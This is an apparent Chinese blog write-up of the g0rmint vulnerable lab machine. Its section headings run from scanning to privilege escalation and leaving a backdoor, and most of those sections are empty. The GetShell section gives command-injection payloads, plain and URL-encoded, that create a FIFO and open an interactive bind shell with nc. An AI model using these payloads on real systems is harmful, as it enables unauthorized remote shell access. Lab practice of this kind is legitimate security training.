靶机记录(五):g0rmint

本文探讨了黑客常用的攻击手段,包括主机发现、端口扫描、FTP渗透、Web漏洞挖掘、GetShell获取权限,以及关键步骤如清痕迹和设置后门。通过实例展示了技术流程和实用技巧,深入浅出地解析了每个阶段的操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

主机发现

端口扫描

FTP

Web渗透

目录扫描

漏洞挖掘

GetShell

提权

清痕迹,留后门 


主机发现

 

端口扫描

 

 FTP

 

Web渗透

目录扫描

漏洞挖掘

代码分析

 

 从重置密码入手

 

看之前写入的一句话木马(登录状态下)

 

GetShell

依次执行:

HACK=`mkfifo /tmp/t`;
HACK=%60mkfifo%20%2ftmp%2ft%60%3B
 
HACK=`cat /tmp/t | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/t`;
HACK=%60cat%20%2ftmp%2ft%20%7C%20%2fbin%2fsh%20-i%202%3E%261%20%7C%20nc%20-l%208888%20%3E%20%2ftmp%2ft%60%3B

 

 

 Hackbar 给我整个 500 的错 人麻了

BP永远滴神

 

 

 提权

 

清痕迹,留后门 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值